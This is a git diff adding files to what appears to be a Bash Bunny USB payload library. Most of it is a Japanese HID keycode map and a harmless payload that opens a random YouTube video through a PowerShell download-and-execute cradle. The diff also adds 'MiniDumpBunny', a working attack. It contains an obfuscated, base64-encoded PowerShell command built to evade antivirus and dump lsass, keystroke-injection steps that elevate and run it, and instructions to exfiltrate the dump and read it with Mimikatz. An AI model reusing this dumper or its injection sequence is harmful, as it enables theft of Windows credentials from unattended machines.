diff --git a/languages/jp.json b/languages/jp.json new file mode 100644 index 00000000..9c3506fa --- /dev/null +++ b/languages/jp.json @@ -0,0 +1,172 @@ +{ + "__comment": "All numbers here are in hex format and 0x is ignored.", + "__comment": " ", + "__comment": "This list is in ascending order of 3rd byte (HID Usage ID).", + "__comment": " See section 10 Keyboard/Keypad Page (0x07)", + "__comment": " of document USB HID Usage Tables Version 1.12.", + "__comment": " ", + "__comment": "Definition of these 3 bytes can be found", + "__comment": " in section B.1 Protocol 1 (Keyboard)", + "__comment": " of document Device Class Definition for HID Version 1.11", + "__comment": " - byte 1: Modifier keys", + "__comment": " - byte 2: Reserved", + "__comment": " - byte 3: Keycode 1", + "__comment": " ", + "__comment": "Both documents can be obtained from link here", + "__comment": " http://www.usb.org/developers/hidpage/", + "__comment": " ", + "__comment": "A = LeftShift + a, { = LeftShift + [", + "__comment": " ", + "CTRL": "01,00,00", + "CONTROL": "01,00,00", + "SHIFT": "02,00,00", + "ALT": "04,00,00", + "GUI": "08,00,00", + "WINDOWS": "08,00,00", + "CTRL-ALT": "05,00,00", + "CTRL-SHIFT": "03,00,00", + "ALT-SHIFT": "06,00,00", + "__comment": "Below 5 key combinations are for Mac OSX", + "__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal", + "COMMAND": "08,00,00", + "COMMAND-CTRL": "09,00,00", + "COMMAND-CTRL-SHIFT": "0B,00,00", + "COMMAND-OPTION": "0C,00,00", + "COMMAND-OPTION-SHIFT": "0E,00,00", + "a": "00,00,04", + "A": "02,00,04", + "b": "00,00,05", + "B": "02,00,05", + "c": "00,00,06", + "C": "02,00,06", + "d": "00,00,07", + "D": "02,00,07", + "e": "00,00,08", + "E": "02,00,08", + "f": "00,00,09", + "F": "02,00,09", + "g": "00,00,0a", + "G": "02,00,0a", + "h": "00,00,0b", + "H": "02,00,0b", + "i": "00,00,0c", + "I": "02,00,0c", + "j": "00,00,0d", + "J": "02,00,0d", + "k": "00,00,0e", + "K": "02,00,0e", + "l": "00,00,0f", + "L": "02,00,0f", + "m": "00,00,10", + "M": "02,00,10", + "n": "00,00,11", + "N": "02,00,11", + "o": "00,00,12", + "O": "02,00,12", + "p": "00,00,13", + "P": "02,00,13", + "q": "00,00,14", + "Q": "02,00,14", + "r": "00,00,15", + "R": "02,00,15", + "s": "00,00,16", + "S": "02,00,16", + "t": "00,00,17", + "T": "02,00,17", + "u": "00,00,18", + "U": "02,00,18", + "v": "00,00,19", + "V": "02,00,19", + "w": "00,00,1a", + "W": "02,00,1a", + "x": "00,00,1b", + "X": "02,00,1b", + "y": "00,00,1c", + "Y": "02,00,1c", + "z": "00,00,1d", + "Z": "02,00,1d", + "1": "00,00,1e", + "!": "02,00,1e", + "2": "00,00,1f", + "\"": "02,00,1f", + "3": "00,00,20", + "#": "02,00,20", + "4": "00,00,21", + "$": "02,00,21", + "5": "00,00,22", + "%": "02,00,22", + "6": "00,00,23", + "&": "02,00,23", + "7": "00,00,24", + "'": "02,00,24", + "8": "00,00,25", + "(": "02,00,25", + "9": "00,00,26", + ")": "02,00,26", + "0": "00,00,27", + "ENTER": "00,00,28", + "ESC": "00,00,29", + "ESCAPE": "00,00,29", + "BACKSPACE": "00,00,2a", + "TAB": "00,00,2b", + "ALT-TAB": "04,00,2b", + "SPACE": "00,00,2c", + " ": "00,00,2c", + "-": "00,00,2d", + "=": "02,00,2d", + "^": "00,00,2e", + "~": "02,00,2e", + "@": "00,00,2f", + "`": "02,00,2f", + "[": "00,00,30", + "{": "02,00,30", + "\\": "00,00,31", + "|": "02,00,31", + "]": "00,00,32", + "}": "02,00,32", + ";": "00,00,33", + "+": "02,00,33", + ":": "00,00,34", + "*": "02,00,34", + ",": "00,00,36", + "<": "02,00,36", + ".": "00,00,37", + ">": "02,00,37", + "/": "00,00,38", + "?": "02,00,38", + "CAPSLOCK": "00,00,39", + "F1": "00,00,3a", + "F2": "00,00,3b", + "F3": "00,00,3c", + "F4": "00,00,3d", + "F5": "00,00,3e", + "F6": "00,00,3f", + "F7": "00,00,40", + "F8": "00,00,41", + "F9": "00,00,42", + "F10": "00,00,43", + "F11": "00,00,44", + "F12": "00,00,45", + "PRINTSCREEN":"00,00,46", + "SCROLLLOCK": "00,00,47", + "PAUSE": "00,00,48", + "BREAK": "00,00,48", + "INSERT": "00,00,49", + "HOME": "00,00,4a", + "PAGEUP": "00,00,4b", + "DELETE": "00,00,4c", + "DEL": "00,00,4c", + "END": "00,00,4d", + "PAGEDOWN": "00,00,4e", + "RIGHTARROW": "00,00,4f", + "RIGHT": "00,00,4f", + "LEFTARROW": "00,00,50", + "LEFT": "00,00,50", + "DOWNARROW": "00,00,51", + "DOWN": "00,00,51", + "UPARROW": "00,00,52", + "UP": "00,00,52", + "NUMLOCK": "00,00,53", + "MENU": "00,00,65", + "APP": "00,00,65" +} diff --git a/payloads/library/credentials/MiniDumpBunny/MiniBunny.bat b/payloads/library/credentials/MiniDumpBunny/MiniBunny.bat new file mode 100644 index 00000000..7e6ea1d9 --- /dev/null +++ b/payloads/library/credentials/MiniDumpBunny/MiniBunny.bat @@ -0,0 +1,2 @@ +ÿþ&cls +powershell.exe -enc JABwAHIAbwBjAGUAcwBzACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAGwAcwBhAHMAcwA7ACgAbgBlAHcALQBPAGIASgBFAGMAVAAgACAASQBPAC4AQwBvAE0AUAByAGUAcwBzAGkAbwBuAC4ARABlAEYAbABhAHQAZQBzAFQAcgBFAEEATQAoAFsAUwB5AHMAVABlAE0ALgBpAG8ALgBtAEUATQBPAHIAeQBzAHQAcgBlAGEAbQBdAFsAcwBZAFMAVABFAE0ALgBjAG8ATgB2AEUAcgBUAF0AOgA6AEYAcgBPAG0AYgBhAFMARQA2ADQAUwBUAHIAaQBuAGcAKAAgACcAegBWAFYAUgBiADkAbwB3AEUASAA3AG4AVgA1AHcANgBKAEIASQBKAEkAbwAxAE8AZQA2AGgAVQBhAFIAMAB0AEcANQBPAGcARQBlAG0ARwBOAEkAUQBxAFEANAA3AEcAbQAyAE4ASABqAG8ARwBpAHEAdgA5ADkANQB5AFEAbABDAGEARQBQADYAMQA2AFcAcAAvAGoAOAArAGIAdgBQADUAOAA5AG4AQQBJAEQANQBJAEEANABGAG0AcwA5AGMAaABsAHcAKwBPAE8ANgBpAFIAVQBIAHcAbQBXAFkAeABPAEsAMQBXAE4AcgBMAGYAUABBAHUAaABRAGUAMwA0AEsAdQBXAEcASwB3AG0AWAA4AEwANwBBAFoANABnAGYAVABQAEMAUQBHAFEAeABXAG0AaQBmAEcAZQBZAEkANwBUAEUAMwBQAFoAeQBhAEMAOQBqADAAOABWADYARwBCADAAWgBTAHQARABMAFMAdgBOADMARQB5ADUAQQBJAHoAOQBDAFcAMAAvAGQAbAAxAE4AdQBtAFcAQwB0AHEAegBtAHkAbABOAHoAZgAzAGcAZAB2AGsATABWADIAYgBoAFgAYQBVAHAAeABrAHUAeAA5ADcANgBnAHUAZABzAG4ANgBIAFMAQwBmAFcAbwB3ADkAcwBaAE0AcwBnAGUATQBVAFIAcgB2AGEAbQBOAFUAegBLAHgAYwBiADAAWgA3AFYATAB2ADAAUgBtAHUAbABwADUAZwBvAGIAVQBoAEQAeAA2ADAAbABtAEIAQgAwAGkAMgBNADAAawBRAHAAVABLADQAUgBpAGwAbgA1AEMAVwA4AEUAdwBUADEATABEAGQATAByAFEAbQBTAGoAcABiADUAYQBDAHIANgBwAGsAUQA4AEUAZQBMAE0ATgA4AGkAbQB0AEIAYwBxADIAQwBvAHMAcgBaADEASwBLAHkAcgBnAHUAQgBJAGQASgBWAHAAMQB3ACsANQBwAEwAYgBvAHMAdwAwAE4AMgBoAC8AQwBqAEcAMQA1AEYAWgBaAC8AdQB0ADAARwBnAHQASQBXAFMANwBDAFAAYwBIAEsAVABUAFQAYwBDAEQASABHAFcATwBtADkAVgBmAGwAOQBKAE0AMQA1AGYAdwBIADkAUwBzAEYAOQByAFYAYQBZAHAAcQBNAHcATwA1AEYAOAA0AEkAMwBDAEIAbQBCAEMAeABxAGgAQwA3AEwAZwBCACsAcwBvAGsARwBhADAASwB5AHkATQBOAG8ATABWAEIAdwBYAGoAVwBkAHEAbwA1ADMAUAB0AHkAUABBAHAAZABMADQAeQBUAHMANgBaAGMAdQA3AC8AQwBSAHQAOABVAGwANABVAEIAYQB3AFkANwBUAGwAVQBoAHMAUwBGAHkASgA1AEwAOQBMADIARwBDAHUAMQA1AHUATgBoAGoAZABlAHUAVwBVAGMANQB5AHIAQwAvAE0AQwBNAEYAWQBoAEwAaQA0AHUAQgBnAFEAegBXAEgAWAB2AEYATgBPAE4ATQBIAGIALwBqAFoAUAB5AFIAbgBLAHIAZgBxAFAAVABsAG4AUQBrAFgAZgBqAGsAMQBHAHYAVwBQAFoARAA4ADEAVgBkAFcANgBxADAARQA1AFkAYQA5AGcASwAzAFIARAB2ADkATgAwAFcAbgA3AHYAWgBGAHQAVABvADcAMQBqAGEAWgBpAC8AMABTAHQALwBoADgAUwAxAHoAMQBwAEoAMgA4AGcAVgBJAHAATwBaAFoASwB2AHcAZQBsAEoAWgBWADYAOABVAGQANwBUAHAANQBxAE8AOQBzADMAagBDAHAATwBpADQAMQBZAHMATwBWAEIAeABvAGkAUQAxAE8AZQBzADUAWQBkAHYAYgBlAGYAOABBAGYAWQBWAGgAVABJAGEAZwAxAGwAagBjAHIAVQBQAFkASwArAEkAdQBPAEUAZABYADcAcQBKADIANQBkAHoASwBmAGIAUABmAE8ANQBqAFMARQBXADQAUgBtAE4AeABEAHcAcQBpAGoATQBpAEgAMgBzAEMATgBuAEcANQBRAFEAMgByADYAMQBwAGgASwBrAEgAZwB5AFYAQgBuAHgAawBjAFUATAAyAEEAZgBZAEMAegBpAEUANwBMAGcAUQBzADgAVwBYAGQAVQBRAG8AdQB3AFUAUQBJAEsANQBZAFMASQBpAEwAYQA4ADMANQB2AHkAUQAzADQAYQBvAGMANgBpAEoARABXADAAbgBPAEMASwBSAGkAVgAwAHoASAA0ACsAQwBGAEQASgBFAFcAbgBxAFIASABtAGkAbgBzAGoAZQBpAGkAYQBQAGEATwBYAHYAUQA1AFgAVwBiAHUARwBnAEoAUgBMAEkALwBZAEQASgBlAG0AcAAyAEcAQgA5ADcAeQBiAFMAYQB0AGMAcwA3AFEASAB6AGYAUABoAEQAawBlAEkAcgBaADAAcwBOAHYARABlAEkAdQBBAGgAUAB5AHEAbAB3AHQAZgA0AEEAJwAgACkAIAAsAFsAcwB5AFMAdABlAG0ALgBJAE8ALgBDAE8AbQBQAFIAZQBTAFMAaQBPAG4ALgBjAG8AbQBwAHIARQBTAFMAaQBPAE4ATQBvAEQARQBdADoAOgBEAGUAQwBPAE0AcAByAGUAcwBTACAAKQB8ACAAZgBPAFIARQBhAGMAaAAgAHsAIABuAGUAdwAtAE8AYgBKAEUAYwBUACAAIABJAG8ALgBzAFQAUgBlAEEATQBSAGUAQQBkAGUAUgAoACQAXwAgACwAWwBzAHkAUwBUAGUAbQAuAHQARQB4AFQALgBlAG4AQwBvAEQASQBuAGcAXQA6ADoAYQBTAEMASQBJACAAKQAgAH0AKQAuAFIARQBBAEQAdABvAEUAbgBkACgAIAApAHwAaQBuAHYAbwBLAEUALQBlAHgAcABSAEUAUwBTAGkAbwBOAA== \ No newline at end of file diff --git a/payloads/library/credentials/MiniDumpBunny/README.md b/payloads/library/credentials/MiniDumpBunny/README.md new file mode 100644 index 00000000..a6fba8e0 --- /dev/null +++ b/payloads/library/credentials/MiniDumpBunny/README.md @@ -0,0 +1,17 @@ +**Title: MiniDumpBunny** + +Author: 0iphor13 + +Version: 1.0 + +What is MiniDumpBunny? +# +*MiniDumpBunny uses Powersploits Out-MiniDump script to dump lsass. The script was rewritten, adapted for BashBunny usage and obfuscated in multiple ways to evade Antivirus.* +# + +**Instruction:** + +Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away. +# +Exfiltrate the .dmp file and read it with Mimikatz. +![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png) \ No newline at end of file diff --git a/payloads/library/credentials/MiniDumpBunny/mimi.png b/payloads/library/credentials/MiniDumpBunny/mimi.png new file mode 100644 index 00000000..e366dd64 Binary files /dev/null and b/payloads/library/credentials/MiniDumpBunny/mimi.png differ diff --git a/payloads/library/credentials/MiniDumpBunny/payload.txt b/payloads/library/credentials/MiniDumpBunny/payload.txt new file mode 100644 index 00000000..2fc58a03 --- /dev/null +++ b/payloads/library/credentials/MiniDumpBunny/payload.txt @@ -0,0 +1,43 @@ +#!/bin/bash +# +# Title: MiniDumpBunny +# Description: Dump lsass with this script, which was obfuscated with multiple layers. +# Author: 0iphor13 +# Version: 1.0 +# Category: Credentials +# Attackmodes: HID, Storage + +LED SETUP + +Q DELAY 500 + +GET SWITCH_POSITION +DUCKY_LANG de + +Q DELAY 500 + +ATTACKMODE HID STORAGE + +#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING + +LED STAGE1 + +Q DELAY 1000 +RUN WIN "powershell Start-Process powershell -Verb runAs" +Q ENTER +Q DELAY 1000 +Q ALT j +Q DELAY 250 + +Q DELAY 250 +Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\MiniBunny.bat')" +Q DELAY 250 +Q STRING " ;mv *.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l" +Q DELAY 250 +Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam" +Q DELAY 250 +Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit" +Q DELAY 300 +Q ENTER + +LED FINISH \ No newline at end of file diff --git a/payloads/library/general/Win_PoSH_RandomVid/payload.txt b/payloads/library/general/Win_PoSH_RandomVid/payload.txt new file mode 100644 index 00000000..1d2e874e --- /dev/null +++ b/payloads/library/general/Win_PoSH_RandomVid/payload.txt @@ -0,0 +1,33 @@ +#!/bin/bash +# Title: Random Video +# Description: Downloads a list of vids from YouTube. Then pick a random one then opens it. +# Author: Cribbit +# Version: 1.0 +# Category: General +# Target: Windows (Powershell 5.1+) +# Attackmodes: RNDIS_ETHERNET HID + +LED SETUP +ATTACKMODE RNDIS_ETHERNET HID + +GET SWITCH_POSITION +GET HOST_IP + + +cd /root/udisk/payloads/$SWITCH_POSITION/ + +# starting server +LED SPECIAL + +# disallow outgoing dns requests so server starts immediately +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 & + +# wait until port is listening +while ! nc -z localhost 80; do sleep 0.2; done + +# attack commences +LED ATTACK +QUACK DELAY 300 +RUN WIN "powershell -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\"" +LED FINISH \ No newline at end of file diff --git a/payloads/library/general/Win_PoSH_RandomVid/readme.md b/payloads/library/general/Win_PoSH_RandomVid/readme.md new file mode 100644 index 00000000..7008f5fb --- /dev/null +++ b/payloads/library/general/Win_PoSH_RandomVid/readme.md @@ -0,0 +1,24 @@ +# Random Video +- Author: Cribbit +- Version: 1.0 +- Tested on: Windows 10 (Powershell 5.1+) +- Category: General +- Attackmode: HID & RNDIS_ETHERNET +- Extensions: Run + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Description +Downloads a list of Hak5 vids from YouTube (about 15 in the rss feed). + +Then pick one at random, then opens it in the browser. + +## Colours +| Status | Colour | Description | +| -------- | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting Powershell script | +| FINISHED | Green blink followed by SOLID | Injection finished | \ No newline at end of file diff --git a/payloads/library/general/Win_PoSH_RandomVid/s b/payloads/library/general/Win_PoSH_RandomVid/s new file mode 100644 index 00000000..20ddb97b --- /dev/null +++ b/payloads/library/general/Win_PoSH_RandomVid/s @@ -0,0 +1,24 @@ +# Get the RSS feed for the Hak5 Channel +Write-Output "Connecting to youtube" +$Response = Invoke-WebRequest -Uri "https://www.youtube.com/feeds/videos.xml?channel_id=UC3s0BtrBJpwNDaflRSoiieQ" -UseBasicParsing -ContentType "application/xml" +Write-Output $Response.StatusCode +# See if it successful +If ($Response.StatusCode -eq "200") { + # set the XML + $Xml = [xml]$Response.Content + $Entries = @() + # Loop each entry creating an object + ForEach ($Entry in $Xml.feed.entry) { + $Entries += [PSCustomObject] @{ + 'Updated' = [datetime]$Entry.updated + 'Title' = $Entry.title + 'Link' = $Entry.Link.href + } + } + # Gets a random number + $int = (Get-Random -Maximum ($Entries.Count -1) -Minimum 0) + $Entry = $Entries[$int] + # Opens link + Start-Process $Entry.Link + Write-Output $Entry.Title +} \ No newline at end of file